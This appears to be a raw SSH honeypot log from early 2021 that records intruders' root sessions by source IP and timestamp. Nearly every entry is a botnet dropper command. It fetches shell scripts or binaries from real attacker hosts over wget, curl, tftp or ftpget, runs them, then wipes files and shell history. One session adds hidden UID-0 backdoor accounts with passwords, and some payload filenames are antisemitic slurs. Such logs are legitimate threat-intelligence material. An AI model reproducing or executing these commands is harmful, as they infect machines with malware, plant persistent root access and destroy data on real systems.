Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.151.68.222/incubusdream.sh; chmod 777 incubusdream.sh; sh incubusdream.sh; tftp 45.151.68.222 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.151.68.222; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * 

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.151.68.222/incubusdream.sh
chmod 777 incubusdream.sh
sh incubusdream.sh
tftp 45.151.68.222 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 45.151.68.222
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 143.110.250.79 24-Feb-2021 02:46:07 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.168.46.11/Sakura.sh; chmod 777 *; sh Sakura.sh; tftp -g 104.168.46.11 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://104.168.46.11/Sakura.sh
chmod 777 *
sh Sakura.sh
tftp -g 104.168.46.11 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 87.233.82.53 24-Feb-2021 10:16:22 ssh2 root
Exec cat /etc/issue
cat /etc/issue
Exec cat /etc/issue
cat /etc/issue

From 40.124.40.216 24-Feb-2021 20:54:51 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.11.244.208/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 51.11.244.208 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 51.11.244.208; chmod 777 tftp2.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.11.244.208/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 51.11.244.208 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 51.11.244.208
chmod 777 tftp2.sh

From 167.71.57.26 25-Feb-2021 23:49:01 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://194.15.36.227/darknetbins.sh; chmod 777 darknetbins.sh; sh darknetbins.sh; tftp 194.15.36.227 -c get darknettftp1.sh; chmod 777 darknettftp1.sh; sh darknettftp1.sh; tftp -r darknettftp2.sh -g 194.15.36.227; chmod 777 darknettftp2.sh; sh darknettftp2.sh; rm -rf darknetbins.sh darknettftp1.sh darknettftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://194.15.36.227/darknetbins.sh
chmod 777 darknetbins.sh
sh darknetbins.sh
tftp 194.15.36.227 -c get darknettftp1.sh
chmod 777 darknettftp1.sh
sh darknettftp1.sh
tftp -r darknettftp2.sh -g 194.15.36.227
chmod 777 darknettftp2.sh
sh darknettftp2.sh
rm -rf darknetbins.sh darknettftp1.sh darknettftp2.sh
rm -rf *

From 209.141.45.21 26-Feb-2021 00:24:40 ssh2 root
Exec wget http://kranskerstuff.kozow.com:8281/sshd -O /var/tmp/sshd; curl http://kranskerstuff.kozow.com:8281/sshd -o /var/tmp/sshd; sh /var/tmp/sshd; rm -rf /var/tmp/sshd; rm -rf /var/tmp/sshd.1; rm -rf /var/tmp/sshd.2
wget http://kranskerstuff.kozow.com:8281/sshd -O /var/tmp/sshd
curl http://kranskerstuff.kozow.com:8281/sshd -o /var/tmp/sshd
sh /var/tmp/sshd
rm -rf /var/tmp/sshd
rm -rf /var/tmp/sshd.1
rm -rf /var/tmp/sshd.2

From 222.206.231.192 27-Feb-2021 15:37:09 ssh2 root
Exec uname -a -v -n
uname -a -v -n

From 2.57.122.97 28-Feb-2021 19:50:24 ssh2 root
Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'

From 2.57.122.97 1-Mar-2021 00:53:37 ssh2 root
Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'

From 209.141.45.21 2-Mar-2021 03:36:49 ssh2 root
Exec cd /tmp; wget sinpropfenoquito.freemyip.com:8281/sshd -O /tmp/sshd; curl sinpropfenoquito.freemyip.com:8281/sshd -o /tmp/sshd; bash /tmp/sshd; rm -rf /tmp/sshd; rm -r /tmp/sshd; rm -rf /var/tmp/sshd; rm -rf /var/tmp/sshd.*; rm -rf /tmp/sshd.*
cd /tmp
wget sinpropfenoquito.freemyip.com:8281/sshd -O /tmp/sshd
curl sinpropfenoquito.freemyip.com:8281/sshd -o /tmp/sshd
bash /tmp/sshd
rm -rf /tmp/sshd
rm -r /tmp/sshd
rm -rf /var/tmp/sshd
rm -rf /var/tmp/sshd.*
rm -rf /tmp/sshd.*

From 31.210.20.147 2-Mar-2021 09:40:27 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.147/0xDSSk.sh; curl -O http://31.210.20.147/0xDSSk.sh; chmod 777 0xDSSk.sh; sh 0xDSSk.sh; tftp 31.210.20.147 -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 31.210.20.147; rm -rf *.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://31.210.20.147/0xDSSk.sh
curl -O http://31.210.20.147/0xDSSk.sh
chmod 777 0xDSSk.sh
sh 0xDSSk.sh
tftp 31.210.20.147 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 31.210.20.147
rm -rf *.sh

From 45.133.1.167 2-Mar-2021 17:56:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.144.225.151/huh.sh; curl -O http://45.144.225.151/huh.sh; chmod 777 huh.sh; sh huh.sh; tftp 45.144.225.151 -c get huh.sh; chmod 777 huh.sh; sh huh.sh; tftp -r huh2.sh -g 45.144.225.151; chmod 777 huh2.sh; sh huh2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.144.225.151 huh1.sh huh1.sh; sh huh1.sh; rm -rf huh.sh huh.sh huh2.sh huh1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.144.225.151/huh.sh
curl -O http://45.144.225.151/huh.sh
chmod 777 huh.sh
sh huh.sh
tftp 45.144.225.151 -c get huh.sh
chmod 777 huh.sh
sh huh.sh
tftp -r huh2.sh -g 45.144.225.151
chmod 777 huh2.sh
sh huh2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.144.225.151 huh1.sh huh1.sh
sh huh1.sh
rm -rf huh.sh huh.sh huh2.sh huh1.sh
rm -rf *

From 52.152.130.178 3-Mar-2021 03:17:23 ssh2 root
Exec lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *
lscpu
wget nasapaul.com/ninfo
chmod +x *
./ninfo
rm -rf *

From 128.199.233.83 4-Mar-2021 01:31:20 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://108.170.53.114/sh; curl -O http://108.170.53.114/sh; chmod 777 sh; sh sh; tftp 108.170.53.114 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 108.170.53.114; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 108.170.53.114 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://108.170.53.114/sh
curl -O http://108.170.53.114/sh
chmod 777 sh
sh sh
tftp 108.170.53.114 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 108.170.53.114
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 108.170.53.114 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 40.123.248.170 5-Mar-2021 02:25:28 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://191.232.48.138/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 191.232.48.138 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 191.232.48.138; chmod 777 tftp2.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://191.232.48.138/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 191.232.48.138 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 191.232.48.138
chmod 777 tftp2.sh

From 198.23.159.28 6-Mar-2021 16:24:57 ssh2 root
Exec cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9
}'

From 31.210.22.2 7-Mar-2021 05:43:29 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.109/ModpEAD/xJSq.x86_64; curl -O http://109.104.151.109/ModpEAD/xJSq.x86_64;cat xjSq.x86_64 >kzpold ;chmod +x *;./kzpold Selfrep.x86_64; tftp 109.104.151.109 -c get xjSq.x86_64; chmod 777 xjSq.x86_64; ./xjSq.x86_64 Exploit.x86_64; rm -rf *.x86_64 kzpold; rm -rf *.x86_64 kzpold
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.109/ModpEAD/xJSq.x86_64
curl -O http://109.104.151.109/ModpEAD/xJSq.x86_64
cat xjSq.x86_64 >kzpold
chmod +x *
./kzpold Selfrep.x86_64
tftp 109.104.151.109 -c get xjSq.x86_64
chmod 777 xjSq.x86_64
./xjSq.x86_64 Exploit.x86_64
rm -rf *.x86_64 kzpold
rm -rf *.x86_64 kzpold

From 40.124.40.216 7-Mar-2021 08:14:08 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.208.155.37/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g 104.208.155.37 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://104.208.155.37/ISIS.sh
chmod 777 *
sh ISIS.sh
tftp -g 104.208.155.37 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 130.61.219.221 7-Mar-2021 16:36:55 ssh2 root
Exec cd /tmp; wget sinpropfenoquitos.freemyip.com:8281/sshd -O /tmp/sshd; curl sinpropfenoquitos.freemyip.com:8281/sshd -o /tmp/sshd; bash /tmp/sshd; rm -rf /tmp/sshd; rm -r /tmp/sshd; rm -rf /var/tmp/sshd; rm -rf /var/tmp/sshd.*; rm -rf /tmp/sshd.*
cd /tmp
wget sinpropfenoquitos.freemyip.com:8281/sshd -O /tmp/sshd
curl sinpropfenoquitos.freemyip.com:8281/sshd -o /tmp/sshd
bash /tmp/sshd
rm -rf /tmp/sshd
rm -r /tmp/sshd
rm -rf /var/tmp/sshd
rm -rf /var/tmp/sshd.*
rm -rf /tmp/sshd.*

From 31.210.22.2 8-Mar-2021 14:23:16 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.108/LjEZs/uYtea.x86_64; curl -O http://109.104.151.108/LjEZs/uYtea.x86_64;cat uYtea.x86_64 >kzpold ;chmod +x *;./kzpold Selfrep.x86_64; tftp 109.104.151.108 -c get uYtea.x86_64; chmod 777 uYtea.x86_64; ./uYtea.x86_64 Exploit.x86_64; rm -rf *.x86_64 kzpold
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.108/LjEZs/uYtea.x86_64
curl -O http://109.104.151.108/LjEZs/uYtea.x86_64
cat uYtea.x86_64 >kzpold
chmod +x *
./kzpold Selfrep.x86_64
tftp 109.104.151.108 -c get uYtea.x86_64
chmod 777 uYtea.x86_64
./uYtea.x86_64 Exploit.x86_64
rm -rf *.x86_64 kzpold

From 165.232.136.87 9-Mar-2021 08:02:06 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://52.152.130.178/sh; curl -O http://52.152.130.178/sh; chmod 777 sh; sh sh; tftp 52.152.130.178 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 52.152.130.178; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 52.152.130.178 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://52.152.130.178/sh
curl -O http://52.152.130.178/sh
chmod 777 sh
sh sh
tftp 52.152.130.178 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 52.152.130.178
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 52.152.130.178 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 202.28.194.163 11-Mar-2021 22:54:23 ssh2 root
Exec cd /tmp;wget 31.210.20.24/bins/UnHAnaAW.x86;chmod +x UnHAnaAW.x86;./UnHAnaAW.x86 Root
cd /tmp
wget 31.210.20.24/bins/UnHAnaAW.x86
chmod +x UnHAnaAW.x86
./UnHAnaAW.x86 Root

From 45.130.138.155 13-Mar-2021 14:50:54 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.23.133.218/Pemex.sh; curl -O http://198.23.133.218/Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp 198.23.133.218 -c get Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp -r Pemex2.sh -g 198.23.133.218; chmod 777 Pemex2.sh; sh Pemex2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.23.133.218 Pemex1.sh Pemex1.sh; sh Pemex1.sh; rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.23.133.218/Pemex.sh
curl -O http://198.23.133.218/Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp 198.23.133.218 -c get Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp -r Pemex2.sh -g 198.23.133.218
chmod 777 Pemex2.sh
sh Pemex2.sh
ftpget -v -u anonymous -p anonymous -P 21 198.23.133.218 Pemex1.sh Pemex1.sh
sh Pemex1.sh
rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh
rm -rf *

From 74.201.28.61 14-Mar-2021 01:52:51 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://142.11.216.5/xxxbins.sh; chmod 777 xxxbins.sh; sh xxxbins.sh; tftp 142.11.216.5 -c get xxxtftp1.sh; chmod 777 xxxtftp1.sh; sh xxxtftp1.sh; tftp -r xxxtftp2.sh -g 142.11.216.5; chmod 777 xxxtftp2.sh; sh xxxtftp2.sh; rm -rf xxxbins.sh xxxtftp1.sh xxxtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://142.11.216.5/xxxbins.sh
chmod 777 xxxbins.sh
sh xxxbins.sh
tftp 142.11.216.5 -c get xxxtftp1.sh
chmod 777 xxxtftp1.sh
sh xxxtftp1.sh
tftp -r xxxtftp2.sh -g 142.11.216.5
chmod 777 xxxtftp2.sh
sh xxxtftp2.sh
rm -rf xxxbins.sh xxxtftp1.sh xxxtftp2.sh
rm -rf *

From 31.210.20.159 14-Mar-2021 13:43:41 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.108/LjEZs/uYtea.x86_64; curl -O http://109.104.151.108/LjEZs/uYtea.x86;cat uYtea.x86 >kzpold ;chmod +x *;./kzpold Exploit.x86_64; tftp 109.104.151.108 -c get uYtea.x86; chmod 777 uYtea.x86; ./uYtea.x86 Exploit.x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.108/LjEZs/uYtea.x86_64
curl -O http://109.104.151.108/LjEZs/uYtea.x86
cat uYtea.x86 >kzpold
chmod +x *
./kzpold Exploit.x86_64
tftp 109.104.151.108 -c get uYtea.x86
chmod 777 uYtea.x86
./uYtea.x86 Exploit.x86_64

From 203.159.80.90 15-Mar-2021 04:23:06 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.168.46.11/aarikibins.sh; chmod 777 aarikibins.sh; sh aarikibins.sh; tftp 104.168.46.11 -c get aarikitftp1.sh; chmod 777 aarikitftp1.sh; sh aarikitftp1.sh; tftp -r aarikitftp2.sh -g 104.168.46.11; chmod 777 aarikitftp2.sh; sh aarikitftp2.sh; rm -rf aarikibins.sh aarikitftp1.sh aarikitftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.168.46.11/aarikibins.sh
chmod 777 aarikibins.sh
sh aarikibins.sh
tftp 104.168.46.11 -c get aarikitftp1.sh
chmod 777 aarikitftp1.sh
sh aarikitftp1.sh
tftp -r aarikitftp2.sh -g 104.168.46.11
chmod 777 aarikitftp2.sh
sh aarikitftp2.sh
rm -rf aarikibins.sh aarikitftp1.sh aarikitftp2.sh
rm -rf *

From 31.210.20.179 15-Mar-2021 06:28:02 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.108/0x83911d24Fx.sh; curl -O http://109.104.151.108/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 109.104.151.108 -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 109.104.151.108; chmod 777 0xtf2984767.sh; sh 0xtf2984767.sh; ftpget -v -u anonymous -p anonymous -P 21 109.104.151.108 0xft6426467.sh 0xft6426467.sh; sh 0xft6426467.sh; rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.108/0x83911d24Fx.sh
curl -O http://109.104.151.108/0x83911d24Fx.sh
chmod 777 0x83911d24Fx.sh
sh 0x83911d24Fx.sh
tftp 109.104.151.108 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 109.104.151.108
chmod 777 0xtf2984767.sh
sh 0xtf2984767.sh
ftpget -v -u anonymous -p anonymous -P 21 109.104.151.108 0xft6426467.sh 0xft6426467.sh
sh 0xft6426467.sh
rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh
rm -rf *

From 143.110.239.48 15-Mar-2021 09:08:46 ssh2 root
Exec wget nasapaul.com/ninfo ; chmod 777 *; ./ninfo ; lscpu
wget nasapaul.com/ninfo
chmod 777 *
./ninfo
lscpu

From 109.104.151.109 18-Mar-2021 03:56:00 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.108/LjEZs/uYtea.x86_64; curl -O http://109.104.151.108/LjEZs/uYtea.x86;cat uYtea.x86_64 >kzpold ;chmod 777 kzpold;./kzpold Exploit.x86_64; tftp 109.104.151.108 -c get uYtea.x86; chmod 777 uYtea.x86; ./uYtea.x86 Selfrep.x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.108/LjEZs/uYtea.x86_64
curl -O http://109.104.151.108/LjEZs/uYtea.x86
cat uYtea.x86_64 >kzpold
chmod 777 kzpold
./kzpold Exploit.x86_64
tftp 109.104.151.108 -c get uYtea.x86
chmod 777 uYtea.x86
./uYtea.x86 Selfrep.x86_64

From 142.93.227.249 18-Mar-2021 22:20:25 ssh2 root
Exec nproc; lspci |grep VGA
nproc
lspci |grep VGA

From 104.236.26.150 19-Mar-2021 16:35:45 ssh2 root
Exec cat /etc/issue ; cwget http://107.172.188.150/INFINITY.x86; chmod +x INFINITY.x86; ./INFINITY.x86; rm -rf INFINITY.x86
cat /etc/issue
cwget http://107.172.188.150/INFINITY.x86
chmod +x INFINITY.x86
./INFINITY.x86
rm -rf INFINITY.x86

From 95.110.134.241 19-Mar-2021 20:53:27 ssh2 root
Exec rm -rf shell;wget http://96.126.105.180/shell;chmod +x shell;./shell;rm -rf shell
rm -rf shell
wget http://96.126.105.180/shell
chmod +x shell
./shell
rm -rf shell

From 185.36.81.52 19-Mar-2021 22:20:26 ssh2 root
Exec payload
payload

From 104.248.197.205 19-Mar-2021 23:47:34 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.75.191.234/sh; curl -O http://51.75.191.234/sh; chmod 777 sh; sh sh; tftp 51.75.191.234 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 51.75.191.234; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 51.75.191.234 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.75.191.234/sh
curl -O http://51.75.191.234/sh
chmod 777 sh
sh sh
tftp 51.75.191.234 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 51.75.191.234
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 51.75.191.234 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 167.71.4.101 20-Mar-2021 03:25:38 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://51.75.191.234/Onionbins.sh; chmod 777 Onionbins.sh; sh Onionbins.sh; tftp 51.75.191.234 -c get Oniontftp1.sh; chmod 777 Oniontftp1.sh; sh Oniontftp1.sh; tftp -r Oniontftp2.sh -g 51.75.191.234; chmod 777 Oniontftp2.sh; sh Oniontftp2.sh; rm -rf Onionbins.sh Oniontftp1.sh Oniontftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://51.75.191.234/Onionbins.sh
chmod 777 Onionbins.sh
sh Onionbins.sh
tftp 51.75.191.234 -c get Oniontftp1.sh
chmod 777 Oniontftp1.sh
sh Oniontftp1.sh
tftp -r Oniontftp2.sh -g 51.75.191.234
chmod 777 Oniontftp2.sh
sh Oniontftp2.sh
rm -rf Onionbins.sh Oniontftp1.sh Oniontftp2.sh
rm -rf *

From 161.35.179.60 20-Mar-2021 23:42:46 ssh2 root
Exec cat /etc/issue ; wget http://107.172.188.150/INFINITY.x86; chmod +x INFINITY.x86; ./INFINITY.x86; rm -rf INFINITY.x86
cat /etc/issue
wget http://107.172.188.150/INFINITY.x86
chmod +x INFINITY.x86
./INFINITY.x86
rm -rf INFINITY.x86

From 104.236.26.153 21-Mar-2021 05:37:41 ssh2 root
Exec cat /etc/issue ; wget http://107.172.188.150/INFINITY.x86; chmod +x INFINITY.x86; ./INFINITY.x86; rm -rf INFINITY.x86 *
cat /etc/issue
wget http://107.172.188.150/INFINITY.x86
chmod +x INFINITY.x86
./INFINITY.x86
rm -rf INFINITY.x86 *

From 199.195.251.205 22-Mar-2021 11:55:18 ssh2 root
Exec cd /tmp; wget http://107.172.249.148/d; curl -O http://107.172.249.148/c; busybox wget http://107.172.249.148/m; chmod 777 d; chmod 777 c; chmod 777 m;  ./d; echo wgets done ; ./c; echo curl done; ./m; echo busybox ran; pkill x-8.6-.ISIS; pkill fuckjewishpeople.x86; pkill x86; pkill x86_64; pkill i686; rm -rf *;
cd /tmp
wget http://107.172.249.148/d
curl -O http://107.172.249.148/c
busybox wget http://107.172.249.148/m
chmod 777 d
chmod 777 c
chmod 777 m
./d
echo wgets done
./c
echo curl done
./m
echo busybox ran
pkill x-8.6-.ISIS
pkill fuckjewishpeople.x86
pkill x86
pkill x86_64
pkill i686
rm -rf *

From 199.195.251.205 23-Mar-2021 05:21:11 ssh2 root
Exec cd /tmp; wget http://107.172.249.148/x86_64; chmod 777 *; ./x86_64 roots
cd /tmp
wget http://107.172.249.148/x86_64
chmod 777 *
./x86_64 roots

From 79.124.60.185 24-Mar-2021 03:14:28 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://87.121.98.51/infectedn.sh; curl -O http://87.121.98.51/infectedn.sh; chmod 777 infectedn.sh; sh infectedn.sh; tftp 87.121.98.51 -c get infectedn.sh; chmod 777 infectedn.sh; sh infectedn.sh; tftp -r infectedn2.sh -g 87.121.98.51; chmod 777 infectedn2.sh; sh infectedn2.sh; ftpget -v -u anonymous -p anonymous -P 21 87.121.98.51 infectedn1.sh infectedn1.sh; sh infectedn1.sh; rm -rf infectedn.sh infectedn.sh infectedn2.sh infectedn1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://87.121.98.51/infectedn.sh
curl -O http://87.121.98.51/infectedn.sh
chmod 777 infectedn.sh
sh infectedn.sh
tftp 87.121.98.51 -c get infectedn.sh
chmod 777 infectedn.sh
sh infectedn.sh
tftp -r infectedn2.sh -g 87.121.98.51
chmod 777 infectedn2.sh
sh infectedn2.sh
ftpget -v -u anonymous -p anonymous -P 21 87.121.98.51 infectedn1.sh infectedn1.sh
sh infectedn1.sh
rm -rf infectedn.sh infectedn.sh infectedn2.sh infectedn1.sh
rm -rf *

From 45.143.221.129 25-Mar-2021 01:53:02 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 45.143.221.129/warz.sh; curl -O 45.143.221.129/warz.sh; chmod 777 warz.sh; sh warz.sh; rm -rf warz.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget 45.143.221.129/warz.sh
curl -O 45.143.221.129/warz.sh
chmod 777 warz.sh
sh warz.sh
rm -rf warz.sh

From 188.161.203.67 25-Mar-2021 15:00:30 ssh2 root
ls
w
free -g
/usr/sbin/useradd -o -u 0 -g 0 r00t -p admin1234
/usr/sbin/useradd -o -u 0 -g 0 .test -p admin1234 passwd root
passwd r00t
passwd .test A@0599343813A@0599343813
history
yum
apt
apt-get update
apt update
apt upgrade
wge
wget
wget http://130.0.164.120/scan.jpg
wget http://130.0.164.120/scan.jpg

From 61.163.97.210 25-Mar-2021 15:04:12 ssh2 root
Exec scp -r -t ~
scp -r -t ~
cd ..
ls
cd ..
ls
cat proxy.doc
cd /root
cat proxy.doc
cat test1.pl
rm -rf /root
ls

From 188.161.203.67 25-Mar-2021 15:06:02 ssh2 root
ls
w

From 87.121.98.51 27-Mar-2021 23:35:36 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.124.60.185/infectedn.sh; curl -O http://79.124.60.185/infectedn.sh; chmod 777 infectedn.sh; sh infectedn.sh; tftp 79.124.60.185 -c get infectedn.sh; chmod 777 infectedn.sh; sh infectedn.sh; tftp -r infectedn2.sh -g 79.124.60.185; chmod 777 infectedn2.sh; sh infectedn2.sh; ftpget -v -u anonymous -p anonymous -P 21 79.124.60.185 infectedn1.sh infectedn1.sh; sh infectedn1.sh; rm -rf infectedn.sh infectedn.sh infectedn2.sh infectedn1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://79.124.60.185/infectedn.sh
curl -O http://79.124.60.185/infectedn.sh
chmod 777 infectedn.sh
sh infectedn.sh
tftp 79.124.60.185 -c get infectedn.sh
chmod 777 infectedn.sh
sh infectedn.sh
tftp -r infectedn2.sh -g 79.124.60.185
chmod 777 infectedn2.sh
sh infectedn2.sh
ftpget -v -u anonymous -p anonymous -P 21 79.124.60.185 infectedn1.sh infectedn1.sh
sh infectedn1.sh
rm -rf infectedn.sh infectedn.sh infectedn2.sh infectedn1.sh
rm -rf *

From 199.195.251.205 28-Mar-2021 16:32:36 ssh2 root
Exec rm -rf x86_64; cd /tmp; wget http://107.172.249.148/x86_64; curl -O http://107.172.249.148/x86_64; busybox wget http://107.172.249.148/x86_64; chmod 777 x86_64; ./x86_64 roots; rm -rf *; nc 1 1;
rm -rf x86_64
cd /tmp
wget http://107.172.249.148/x86_64
curl -O http://107.172.249.148/x86_64
busybox wget http://107.172.249.148/x86_64
chmod 777 x86_64
./x86_64 roots
rm -rf *
nc 1 1

From 113.54.156.146 29-Mar-2021 09:16:30 ssh2 root
Exec uname -a
uname -a
Exec uname -a
Exec uname -a
uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a

From 113.54.156.146 29-Mar-2021 09:16:32 ssh2 root
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a

From 138.201.225.164 30-Mar-2021 01:49:14 ssh2 root
Exec wget nasapaul.com/ninfo ;chmod 777 *; ./ninfo
wget nasapaul.com/ninfo
chmod 777 *
./ninfo

From 168.119.208.213 30-Mar-2021 08:21:42 ssh2 root
Exec wget NasaPaul.com/ninfo ;chmod 777 *; ./ninfo
wget NasaPaul.com/ninfo
chmod 777 *
./ninfo

From 104.168.123.206 3-Apr-2021 05:43:18 ssh2 root
